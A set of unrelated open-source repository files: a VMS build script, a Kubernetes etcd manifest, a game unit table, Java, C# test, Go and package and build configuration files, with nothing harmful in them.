$! Build 'em.
$!
$ write sys$output "Compiling PNG book programs ..."
$ CALL MAKE readpng.OBJ "cc ''CCOPT' readpng" -
readpng.c readpng.h
$ CALL MAKE readpng2.OBJ "cc ''CCOPT' readpng2" -
readpng2.c readpng2.h
$ CALL MAKE writepng.OBJ "cc ''CCOPT' writepng" -
writepng.c writepng.h
$ write sys$output "Building rpng-x..."
$ CALL MAKE rpng-x.OBJ "cc ''CCOPT' rpng-x" -
rpng-x.c readpng.h
$ call make rpng-x.exe -
"LINK rpng-x,readpng,lib.opt/opt,x11.opt/opt" -
rpng-x.obj readpng.obj
$ write sys$output "Building rpng2-x..."
$ CALL MAKE rpng2-x.OBJ "cc ''CCOPT' rpng2-x" -
rpng2-x.c readpng2.h
$ call make rpng2-x.exe -
"LINK rpng2-x,readpng2,lib.opt/opt,x11.opt/opt" -
rpng2-x.obj readpng2.obj
$ write sys$output "Building wpng..."
$ CALL MAKE wpng.OBJ "cc ''CCOPT' wpng" -
wpng.c writepng.h
$ call make wpng.exe -
"LINK wpng,writepng,lib.opt/opt" -
wpng.obj writepng.obj
$ exit
$!
$MAKE: SUBROUTINE !SUBROUTINE TO CHECK DEPENDENCIES
$ V = 'F$Verify(0)
$! P1 = What we are trying to make
$! P2 = Command to make it
$! P3 - P8 What it depends on
$!
$! Make-style rebuild check: run P2 only if P1 is missing or any
$! dependency file listed in P3..P8 is newer than P1's revision time.
$
$ If F$Search(P1) .Eqs. "" Then Goto Makeit
$ Time = F$CvTime(F$File(P1,"RDT"))
$arg=3
$Loop:
$ Argument = P'arg
$ If Argument .Eqs. "" Then Goto Exit
$ El=0
$Loop2:
$! Each argument may hold several space-separated file names.
$ File = F$Element(El," ",Argument)
$ If File .Eqs. " " Then Goto Endl
$ AFile = ""
$Loop3:
$! F$Search iterates over wildcard matches until it repeats or empties.
$ OFile = AFile
$ AFile = F$Search(File)
$ If AFile .Eqs. "" .Or. AFile .Eqs. OFile Then Goto NextEl
$ If F$CvTime(F$File(AFile,"RDT")) .Ges. Time Then Goto Makeit
$ Goto Loop3
$NextEL:
$ El = El + 1
$ Goto Loop2
$EndL:
$ arg=arg+1
$ If arg .Le. 8 Then Goto Loop
$ Goto Exit
$
$Makeit:
$! Echo and execute the build command with verification suppressed.
$ VV=F$VERIFY(0)
$ write sys$output P2
$ 'P2
$ VV='F$Verify(VV)
$Exit:
$ If V Then Set Verify
$ENDSUBROUTINE
| {
"pile_set_name": "Github"
} |
# Single-replica etcd (v3.0.15) ReplicationController. All client and peer
# traffic is TLS with mutual authentication; certs come from the mounted
# serving-etcd secret and the CA from the etcd-ca ConfigMap.
kind: ReplicationController
apiVersion: v1
metadata:
  name: etcd
  labels:
    etcd: "true"
spec:
  replicas: 1
  selector:
    etcd: "true"
  template:
    metadata:
      labels:
        etcd: "true"
    spec:
      containers:
      - name: etcd
        image: quay.io/coreos/etcd:v3.0.15
        command:
        - "etcd"
        # Client API: listen on all interfaces, advertise the service DNS name.
        - "--listen-client-urls=https://0.0.0.0:4001"
        - "--advertise-client-urls=https://etcd.kube-public.svc:4001"
        - "--trusted-ca-file=/var/run/serving-ca/ca.crt"
        - "--cert-file=/var/run/serving-cert/tls.crt"
        - "--key-file=/var/run/serving-cert/tls.key"
        # Require client certificates signed by the trusted CA.
        - "--client-cert-auth=true"
        # Peer API: same TLS setup; single-member cluster points at itself.
        - "--listen-peer-urls=https://0.0.0.0:7001"
        - "--initial-advertise-peer-urls=https://etcd.kube-public.svc:7001"
        - "--peer-trusted-ca-file=/var/run/serving-ca/ca.crt"
        - "--peer-cert-file=/var/run/serving-cert/tls.crt"
        - "--peer-key-file=/var/run/serving-cert/tls.key"
        - "--peer-client-cert-auth=true"
        - "--initial-cluster=default=https://etcd.kube-public.svc:7001"
        ports:
        - containerPort: 4001
        volumeMounts:
        - mountPath: /var/run/serving-cert
          name: volume-serving-cert
        - mountPath: /var/run/serving-ca
          name: volume-etcd-ca
      volumes:
      - secret:
          defaultMode: 420
          secretName: serving-etcd
        name: volume-serving-cert
      - configMap:
          defaultMode: 420
          name: etcd-ca
        name: volume-etcd-ca
| {
"pile_set_name": "Github"
} |
Clan Jade Falcon Front-Line Medium Aerospace (FMU)
Visigoth B,1
Tyre 2,2
Visigoth C,3
Visigoth Prime,4
Jagatai Prime,5
Visigoth Prime,6
Visigoth A,5
Jagatai B,4
Tyre (Standard),3
Jagatai A,2
Jagatai C,1
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2010-2012 Amazon Technologies, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at:
*
* http://aws.amazon.com/apache2.0
*
* This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
* OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and
* limitations under the License.
*/
package com.amazonaws.eclipse.core;
import java.net.URL;
import org.eclipse.ui.PartInitException;
import org.eclipse.ui.PlatformUI;
import org.eclipse.ui.browser.IWorkbenchBrowserSupport;
public class BrowserUtils {

    /**
     * Style flags requested for browser instances: an external browser with
     * location bar, navigation bar and status line.
     */
    private static final int BROWSER_STYLE =
        IWorkbenchBrowserSupport.AS_EXTERNAL
            | IWorkbenchBrowserSupport.LOCATION_BAR
            | IWorkbenchBrowserSupport.NAVIGATION_BAR
            | IWorkbenchBrowserSupport.STATUS;

    /**
     * Opens the specified URL in an external browser window.
     *
     * @param url The URL to open.
     * @throws PartInitException if the workbench cannot create or open the browser.
     */
    public static void openExternalBrowser(URL url) throws PartInitException {
        PlatformUI.getWorkbench()
                  .getBrowserSupport()
                  .createBrowser(BROWSER_STYLE, null, null, null)
                  .openURL(url);
    }

    /**
     * Opens the specified URL string in an external browser window, reporting
     * (rather than throwing) any failure through the toolkit's error reporter.
     *
     * @param url The URL to open.
     */
    public static void openExternalBrowser(String url) {
        try {
            openExternalBrowser(new URL(url));
        } catch (Exception cause) {
            AwsToolkitCore.getDefault().reportException(
                    "Unable to open external web browser to '" + url + "': " + cause.getMessage(), cause);
        }
    }
}
| {
"pile_set_name": "Github"
} |
using PuppeteerSharp;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using Xunit;
namespace Element.Test.FormTests
{
[TestName("Form 表单", "基础用法")]
public class Test1 : IDemoTester
{
private ElementHandle submitButton;
private ElementHandle resetButton;
private ElementHandle[] formItems;
private string expectedDate;
public async Task TestAsync(DemoCard demoCard)
{
await AssertFillAsync(demoCard);
await submitButton.ClickAsync();
await Task.Delay(500);
var resultEl = await demoCard.Page.QuerySelectorAsync("div.el-message-box__wrapper > div > div.el-message-box__content > div.el-message-box__message > p");
var result = await resultEl.EvaluateFunctionAsync<string>("x=>x.innerText");
Assert.Equal($"名称:测试活动,区域:Bejing,区域2:Bejing,日期:{DateTime.Now.ToString("yyyy/M/1")} 0:00:00,即时配送:False,性质:Offline,特殊资源:场地,枚举资源:Option1,活动形式:测试活动", result);
var okButton = await demoCard.Page.QuerySelectorAsync("div.el-message-box__wrapper > div > div.el-message-box__btns > button");
Assert.NotNull(okButton);
await okButton.ClickAsync();
await Task.Delay(500);
okButton = await demoCard.Page.QuerySelectorAsync("div.el-message-box__wrapper > div > div.el-message-box__btns > button");
Assert.Null(okButton);
await resetButton.ClickAsync();
await Task.Delay(50);
await AssertFormAsync(demoCard, false, new List<int>());
}
private async Task AssertFillAsync(DemoCard demoCard)
{
var filledIndexes = new List<int>();
await AssertFormAsync(demoCard, false, filledIndexes);
await submitButton.ClickAsync();
await Task.Delay(50);
await AssertFormAsync(demoCard, true, filledIndexes);
var formItem1 = formItems.FirstOrDefault();
var formItem1Input = await formItem1.QuerySelectorAsync("div.el-input > input");
var label1 = await formItem1.QuerySelectorAsync("label");
await formItem1Input.TypeAsync("测试活动");
await label1.ClickAsync();
await Task.Delay(50);
var text1 = await formItem1Input.EvaluateFunctionAsync<string>("x=>x.value");
Assert.Equal("测试活动", text1.Trim());
filledIndexes.Add(0);
await AssertFormAsync(demoCard, true, filledIndexes);
//跳过活动区域的测试
var formItem3 = formItems.Skip(2).FirstOrDefault();
var content3 = await formItem3.QuerySelectorAsync("div.el-form-item__content");
var selector = await content3.QuerySelectorAsync("div.el-select > div.el-input.el-input--suffix");
await selector.ClickAsync();
await Task.Delay(500);
var firstItem = await demoCard.Page.QuerySelectorAsync("div.el-select-dropdown.el-popper > div.el-scrollbar > div.el-select-dropdown__wrap.el-scrollbar__wrap > ul.el-scrollbar__view.el-select-dropdown__list > li.el-select-dropdown__item");
await firstItem.ClickAsync();
await Task.Delay(500);
var itemText = await firstItem.EvaluateFunctionAsync<string>("x=>x.innerText");
var input = await content3.QuerySelectorAsync("div.el-select > div.el-input.el-input--suffix > input[type='text'][placeholder='请选择活动区域'].el-input__inner");
var selectedItemText = await input.EvaluateFunctionAsync<string>("x=>x.value");
Assert.Equal(itemText?.Trim(), selectedItemText?.Trim());
firstItem = await demoCard.Page.QuerySelectorAsync("div.el-select-dropdown.el-popper > div.el-scrollbar > div.el-select-dropdown__wrap.el-scrollbar__wrap > ul.el-scrollbar__view.el-select-dropdown__list > li.el-select-dropdown__item");
Assert.Null(firstItem);
filledIndexes.Add(2);
await AssertFormAsync(demoCard, true, filledIndexes);
//活动时间
var formItem4 = formItems.Skip(3).FirstOrDefault();
var content4 = await formItem4.QuerySelectorAsync("div.el-form-item__content");
var selector4 = await content4.QuerySelectorAsync("div.el-input.el-date-editor.el-input--prefix.el-input--suffix.el-date-editor--date");
await selector4.ClickAsync();
await Task.Delay(500);
var firstItem4 = await demoCard.Page.QuerySelectorAsync("div.el-picker-panel.el-date-picker.el-popper > div.el-picker-panel__body-wrapper > div.el-picker-panel__body > div.el-picker-panel__content > table > tbody > tr.el-date-table__row > td.available > div > span");
await firstItem4.ClickAsync();
var day = await firstItem4.EvaluateFunctionAsync<string>("x=>x.innerText");
expectedDate = DateTime.Now.ToString($"yyyy-MM-{day.PadLeft(2, '0')}");
await Task.Delay(500);
var input4 = await content4.QuerySelectorAsync("div.el-input.el-date-editor.el-input--prefix.el-input--suffix.el-date-editor--date > input[type='text'][placeholder='请选择日期'][name='Time'].el-input__inner");
var selectedItemText4 = await input4.EvaluateFunctionAsync<string>("x=>x.value");
Assert.Equal(expectedDate, selectedItemText4);
firstItem4 = await demoCard.Page.QuerySelectorAsync("div.el-picker-panel.el-date-picker.el-popper > div.el-picker-panel__body-wrapper > div.el-picker-panel__body > div.el-picker-panel__content > table > tbody > tr.el-date-table__row > td.available > div > span");
Assert.Null(firstItem);
filledIndexes.Add(3);
await AssertFormAsync(demoCard, true, filledIndexes);
//即时配送
//活动性质
var formItem6 = formItems.Skip(5).FirstOrDefault();
var content6 = await formItem6.QuerySelectorAsync("div.el-form-item__content");
var checkbox6 = (await content6.QuerySelectorAllAsync("div.el-checkbox-group > label.el-checkbox > span.el-checkbox__label"))[1];
await checkbox6.ClickAsync();
await Task.Delay(50);
var checkedCheckbox6 = (await content6.QuerySelectorAsync("div.el-checkbox-group > label.el-checkbox.is-checked > span.el-checkbox__label"));
var checkboxLabel = await checkbox6.EvaluateFunctionAsync<string>("x=>x.innerText");
var checkedCheckboxLabel = await checkedCheckbox6.EvaluateFunctionAsync<string>("x=>x.innerText");
Assert.Equal("地推活动", checkboxLabel.Trim());
Assert.Equal("地推活动", checkedCheckboxLabel.Trim());
filledIndexes.Add(5);
await AssertFormAsync(demoCard, true, filledIndexes);
//特殊资源
var formItem7 = formItems.Skip(6).FirstOrDefault();
var content7 = await formItem7.QuerySelectorAsync("div.el-form-item__content");
var radio7 = (await content7.QuerySelectorAllAsync("label.el-radio.el-radio-button--default > span.el-radio__label"))[1];
await radio7.ClickAsync();
await Task.Delay(50);
var checkedRadio7 = (await content7.QuerySelectorAsync("label.el-radio.is-checked.el-radio-button--default > span.el-radio__label"));
var radioLabel7 = await radio7.EvaluateFunctionAsync<string>("x=>x.innerText");
var checkedRadioLabel7 = await checkedRadio7.EvaluateFunctionAsync<string>("x=>x.innerText");
Assert.Equal("线上场地免费", radioLabel7.Trim());
Assert.Equal("线上场地免费", checkedRadioLabel7.Trim());
filledIndexes.Add(6);
await AssertFormAsync(demoCard, true, filledIndexes);
//活动形式
var formItem8 = formItems.Skip(7).FirstOrDefault();
var formItem8Input = await formItem8.QuerySelectorAsync("div.el-input > input");
var label8 = await formItem1.QuerySelectorAsync("label");
await formItem8Input.TypeAsync("测试活动");
await label8.ClickAsync();
await Task.Delay(50);
var text8 = await formItem8Input.EvaluateFunctionAsync<string>("x=>x.value");
Assert.Equal("测试活动", text8.Trim());
filledIndexes.Add(7);
await AssertFormAsync(demoCard, true, filledIndexes);
}
private async Task AssertFormAsync(DemoCard demoCard, bool showRequired, List<int> filledIndexes)
{
var form = await demoCard.Body.QuerySelectorAsync("form.el-form--label-left.el-form");
Assert.NotNull(form);
formItems = await form.QuerySelectorAllAsync("div.el-form-item");
Assert.Equal(9, formItems.Length);
foreach (var formItem in formItems)
{
var index = Array.IndexOf(formItems, formItem);
var label = await formItem.QuerySelectorAsync("label[for='name'].el-form-item__label");
var content = await formItem.QuerySelectorAsync("div.el-form-item__content");
Assert.NotNull(content);
var contentMarginLeft = await content.EvaluateFunctionAsync<string>("x=>x.style.marginLeft");
var classList = await formItem.EvaluateFunctionAsync<string>("x=>x.classList.toString()");
var clsList = classList.Split(' ').Select(x => x.Trim()).ToArray() ?? new string[0];
string labelWidth = string.Empty;
string labelText = string.Empty;
var error = await content.QuerySelectorAsync("div.el-form-item__error");
if (index < 8)
{
Assert.NotNull(label);
labelWidth = await label.EvaluateFunctionAsync<string>("x=>x.style.width");
labelText = await label.EvaluateFunctionAsync<string>("x=>x.innerText");
Assert.Equal("100px", contentMarginLeft);
Assert.Equal("100px", labelWidth);
if (index == 2)
{
Assert.DoesNotContain("is-required", clsList);
}
else
{
Assert.Contains("is-required", clsList);
}
}
else
{
Assert.Null(label);
Assert.True(string.IsNullOrWhiteSpace(contentMarginLeft));
Assert.True(string.IsNullOrWhiteSpace(labelWidth));
Assert.DoesNotContain("is-required", clsList);
}
if (index == 0)
{
Assert.Equal("活动名称", labelText?.Trim());
var input = await content.QuerySelectorAsync("div.el-input > input[type='text'][name='Name'][placeholder='请输入内容'].el-input__inner");
Assert.NotNull(input);
var inputValue = await input.EvaluateFunctionAsync<string>("x=>x.value");
if (filledIndexes.Contains(0))
{
Assert.Null(error);
Assert.Equal("测试活动", inputValue);
}
else
{
await AssertErrorAsync(showRequired, error, "请确认活动名称");
Assert.Equal(string.Empty, inputValue);
}
continue;
}
if (index == 1)
{
Assert.Equal("活动区域", labelText?.Trim());
var input = await content.QuerySelectorAsync("div.el-select > div.el-input.el-input--suffix > input[type='text'][placeholder='请选择活动区域'].el-input__inner");
Assert.NotNull(input);
var inputValue = await input.EvaluateFunctionAsync<string>("x=>x.value");
Assert.Equal("北京", inputValue);
var icon = await content.QuerySelectorAsync("div.el-select > div.el-input.el-input--suffix > span.el-input__suffix > span.el-input__suffix-inner > i.el-input__icon.el-select__caret.el-icon-arrow-up");
Assert.NotNull(icon);
Assert.Null(error);
continue;
}
if (index == 2)
{
Assert.Equal("活动区域2", labelText?.Trim());
var input = await content.QuerySelectorAsync("div.el-select > div.el-input.el-input--suffix > input[type='text'][placeholder='请选择活动区域'].el-input__inner");
var inputValue = await input.EvaluateFunctionAsync<string>("x=>x.value");
Assert.NotNull(input);
var icon = await content.QuerySelectorAsync("div.el-select > div.el-input.el-input--suffix > span.el-input__suffix > span.el-input__suffix-inner > i.el-input__icon.el-select__caret.el-icon-arrow-up");
Assert.NotNull(icon);
Assert.Null(error);
if (filledIndexes.Contains(2))
{
Assert.Equal("北京", inputValue);
}
else
{
Assert.Equal(string.Empty, inputValue);
}
continue;
}
if (index == 3)
{
Assert.Equal("活动时间", labelText?.Trim());
var input = await content.QuerySelectorAsync("div.el-input.el-date-editor.el-input--prefix.el-input--suffix.el-date-editor--date > input[type='text'][placeholder='请选择日期'][name='Time'].el-input__inner");
Assert.NotNull(input);
var inputValue = await input.EvaluateFunctionAsync<string>("x=>x.value");
var icon = await content.QuerySelectorAsync("div.el-input.el-date-editor.el-input--prefix.el-input--suffix.el-date-editor--date > span.el-input__prefix > i.el-input__icon.el-icon-date");
Assert.NotNull(icon);
if (filledIndexes.Contains(index))
{
var selectedDay = await input.EvaluateFunctionAsync<string>("x=>x.value");
Assert.Equal(expectedDate, selectedDay);
Assert.Null(error);
}
else
{
Assert.Equal(string.Empty, inputValue);
await AssertErrorAsync(showRequired, error, "请确认活动时间");
}
continue;
}
if (index == 4)
{
Assert.Equal("即时配送", labelText?.Trim());
var input = await content.QuerySelectorAsync("div.el-switch > input[type='checkbox'].el-switch__input");
Assert.NotNull(input);
var icon = await content.QuerySelectorAsync("div.el-switch > span.el-switch__core");
Assert.NotNull(icon);
var borderColor = await icon.EvaluateFunctionAsync<string>("x=>x.style.borderColor");
Assert.Equal("rgb(19, 206, 102)", borderColor);
var backgroundColor = await icon.EvaluateFunctionAsync<string>("x=>x.style.backgroundColor");
Assert.Equal("rgb(192, 204, 218)", backgroundColor);
Assert.Null(error);
continue;
}
if (index == 5)
{
Assert.Equal("活动性质", labelText?.Trim());
var checkboxes = await content.QuerySelectorAllAsync("div.el-checkbox-group > label.el-checkbox");
Assert.Equal(2, checkboxes.Length);
if (filledIndexes.Contains(index))
{
Assert.Null(error);
}
else
{
await AssertErrorAsync(showRequired, error, "请确认活动性质");
}
continue;
}
if (index == 6)
{
Assert.Equal("特殊资源", labelText?.Trim());
var radios = await content.QuerySelectorAllAsync("label.el-radio.el-radio-button--default");
Assert.Equal(2, radios.Length);
if (filledIndexes.Contains(index))
{
Assert.Null(error);
}
else
{
await AssertErrorAsync(showRequired, error, "请确认特殊资源");
}
continue;
}
if (index == 7)
{
Assert.Equal("活动形式", labelText?.Trim());
var input = await content.QuerySelectorAsync("div.el-input > input[type='textarea'][name='Description'][placeholder='请输入内容'].el-input__inner");
Assert.NotNull(input);
var inputValue = await input.EvaluateFunctionAsync<string>("x=>x.value");
if (filledIndexes.Contains(index))
{
Assert.Equal("测试活动", inputValue);
Assert.Null(error);
}
else
{
Assert.Equal(string.Empty, inputValue);
await AssertErrorAsync(showRequired, error, "请确认活动形式");
}
continue;
}
if (index == 8)
{
Assert.True(string.IsNullOrWhiteSpace(labelText));
submitButton = await content.QuerySelectorAsync("button.el-button.el-button--primary");
Assert.NotNull(submitButton);
resetButton = await content.QuerySelectorAsync("button.el-button.el-button--default");
Assert.NotNull(resetButton);
continue;
}
throw new Exception(index.ToString());
}
}
private static async Task AssertErrorAsync(bool showRequired, ElementHandle error, string expectedRrrorText)
{
if (showRequired)
{
Assert.NotNull(error);
var errorText = await error.EvaluateFunctionAsync<string>("x=>x.innerText");
Assert.Equal(expectedRrrorText, errorText.Trim());
}
}
}
}
| {
"pile_set_name": "Github"
} |
// compile
// Copyright 2012 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// gccgo crashed compiling this.
package main
// S wraps an array of two slices; assigning a [2][]int function result
// into this composite is what gccgo crashed on (see header comment).
type S struct {
	f [2][]int
}

// F returns the zero value of [2][]int: an array of two nil slices.
func F() (r [2][]int) {
	return
}

func main() {
	// `a` is a nil slice, so a[0] would panic if this program were run;
	// the "// compile" directive above means the test only requires that
	// this file compiles.
	var a []S
	a[0].f = F()
}
| {
"pile_set_name": "Github"
} |
{
"name": "inherits",
"description": "Browser-friendly inheritance fully compatible with standard node.js inherits()",
"version": "2.0.1",
"keywords": [
"inheritance",
"class",
"klass",
"oop",
"object-oriented",
"inherits",
"browser",
"browserify"
],
"main": "./inherits.js",
"browser": "./inherits_browser.js",
"repository": {
"type": "git",
"url": "git://github.com/isaacs/inherits.git"
},
"license": "ISC",
"scripts": {
"test": "node test"
},
"bugs": {
"url": "https://github.com/isaacs/inherits/issues"
},
"_id": "[email protected]",
"dist": {
"shasum": "b17d08d326b4423e568eff719f91b0b1cbdf69f1",
"tarball": "http://registry.npmjs.org/inherits/-/inherits-2.0.1.tgz"
},
"_from": "inherits@>=2.0.1 <2.1.0",
"_npmVersion": "1.3.8",
"_npmUser": {
"name": "isaacs",
"email": "[email protected]"
},
"maintainers": [
{
"name": "isaacs",
"email": "[email protected]"
}
],
"directories": {},
"_shasum": "b17d08d326b4423e568eff719f91b0b1cbdf69f1",
"_resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.1.tgz",
"readme": "ERROR: No README data found!",
"homepage": "https://github.com/isaacs/inherits#readme"
}
| {
"pile_set_name": "Github"
} |
; This file is meant to be used with Onion http://c9s.github.com/Onion/
; For instructions on how to build a PEAR package of Predis please follow
; the instructions at this URL:
;
; https://github.com/c9s/Onion#a-quick-tutorial-for-building-pear-package
;
[package]
name = "Predis"
desc = "Flexible and feature-complete PHP client library for Redis"
homepage = "http://github.com/nrk/predis"
license = "MIT"
version = "0.8.7"
stability = "stable"
channel = "pear.nrk.io"
author = "Daniele Alessandri \"nrk\" <[email protected]>"
[require]
php = ">= 5.3.2"
pearinstaller = "1.4.1"
[roles]
*.xml.dist = test
*.md = doc
LICENSE = doc
[optional phpiredis]
hint = "Add support for faster protocol handling with phpiredis"
extensions[] = socket
extensions[] = phpiredis
[optional webdis]
hint = "Add support for Webdis"
extensions[] = curl
extensions[] = phpiredis
| {
"pile_set_name": "Github"
} |
# Makefile generated by XPJ for LINUX32
# NOTE(review): this file is generated -- change the XPJ project that
# produces it rather than editing here, or edits will be lost on
# regeneration.
-include Makefile.custom
ProjectName = PhysXExtensions
# Sources of the PhysXExtensions static library: the extensions proper
# (joints, defaults, cloth cookers, ...), the serialization code
# (binary + RepX/XML), and the generated metadata objects.
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtBroadPhase.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtClothFabricCooker.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtClothGeodesicTetherCooker.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtClothMeshQuadifier.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtClothSimpleTetherCooker.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtCollection.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtConvexMeshExt.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtCpuWorkerThread.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtD6Joint.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtD6JointSolverPrep.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtDefaultCpuDispatcher.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtDefaultErrorCallback.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtDefaultSimulationFilterShader.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtDefaultStreams.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtDistanceJoint.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtDistanceJointSolverPrep.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtExtensions.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtFixedJoint.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtFixedJointSolverPrep.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtJoint.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtMetaData.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtParticleExt.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtPrismaticJoint.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtPrismaticJointSolverPrep.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtPvd.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtPxStringTable.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtRaycastCCD.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtRevoluteJoint.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtRevoluteJointSolverPrep.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtRigidBodyExt.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtSceneQueryExt.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtSimpleFactory.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtSmoothNormals.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtSphericalJoint.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtSphericalJointSolverPrep.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtTriangleMeshExt.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/SnSerialUtils.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/SnSerialization.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/SnSerializationRegistry.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnBinaryDeserialization.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnBinarySerialization.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnConvX.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnConvX_Align.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnConvX_Convert.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnConvX_Error.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnConvX_MetaData.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnConvX_Output.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnConvX_Union.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnSerializationContext.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Xml/SnJointRepXSerializer.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Xml/SnRepXCoreSerializer.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Xml/SnRepXUpgrader.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Xml/SnXmlSerialization.cpp
PhysXExtensions_cppfiles += ./../../PhysXMetaData/extensions/src/PxExtensionAutoGeneratedMetaDataObjects.cpp
# Auto-generated dependency files (.P), one set per configuration, so that
# header changes trigger rebuilds.
PhysXExtensions_cpp_debug_dep    = $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.P, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_cc_debug_dep    = $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.debug.P, $(PhysXExtensions_ccfiles)))))
PhysXExtensions_c_debug_dep      = $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.P, $(PhysXExtensions_cfiles)))))
PhysXExtensions_debug_dep      = $(PhysXExtensions_cpp_debug_dep) $(PhysXExtensions_cc_debug_dep) $(PhysXExtensions_c_debug_dep)
-include $(PhysXExtensions_debug_dep)
PhysXExtensions_cpp_checked_dep    = $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.P, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_cc_checked_dep    = $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.checked.P, $(PhysXExtensions_ccfiles)))))
PhysXExtensions_c_checked_dep      = $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.P, $(PhysXExtensions_cfiles)))))
PhysXExtensions_checked_dep      = $(PhysXExtensions_cpp_checked_dep) $(PhysXExtensions_cc_checked_dep) $(PhysXExtensions_c_checked_dep)
-include $(PhysXExtensions_checked_dep)
PhysXExtensions_cpp_profile_dep    = $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.P, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_cc_profile_dep    = $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.profile.P, $(PhysXExtensions_ccfiles)))))
PhysXExtensions_c_profile_dep      = $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.P, $(PhysXExtensions_cfiles)))))
PhysXExtensions_profile_dep      = $(PhysXExtensions_cpp_profile_dep) $(PhysXExtensions_cc_profile_dep) $(PhysXExtensions_c_profile_dep)
-include $(PhysXExtensions_profile_dep)
PhysXExtensions_cpp_release_dep    = $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.P, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_cc_release_dep    = $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.release.P, $(PhysXExtensions_ccfiles)))))
